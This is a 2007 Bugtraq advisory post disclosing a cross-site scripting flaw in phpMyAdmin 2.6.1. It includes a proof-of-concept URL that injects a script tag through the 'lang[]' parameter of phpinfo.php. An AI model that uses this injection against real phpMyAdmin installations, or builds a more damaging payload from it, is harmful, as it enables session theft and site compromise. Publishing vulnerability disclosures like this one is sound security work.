
Date: 8 Apr 2007 08:27:38 -0000
From: the_3dit0r@...oo.com
To: bugtraq@...urityfocus.com
Subject: phpMyAdmin 2.6.1 Local Cross Site Scripting

"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """ 
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """ 
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
   Xmor$ Security Vulnerability Research TM

# Tilte: phpMyAdmin 2.6.1 Local Cross Site Scripting 

# Author..................: [the_Edit0r]
# HomePage................: [Www.XmorS-SEurity.coM]
# Location ...............: [Iran]
# Software ...............: [phpMyAdmin ] 
# Impact..................: [ Remote ]
# Site Script ............: [http://sourceforge.net/projects/phpmyadmin/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ]
 

------------------------------- proof Of Concept ---------------------------
 Link : http://localhost/mysql/phpinfo.php?lang=fa-utf-8&server=1&collation_connection=utf8_general_ci

http://localhost/mysql/phpinfo.php?lang[]=<script>alert(/the_Edit0r/);</script>&server=1&collation_connection=utf8_general_ci

---------------------------------------------------------------------------

# Contact me : the_3dit0r[at]Yahoo[dot]coM
# [XmorS-SEcurity.coM]
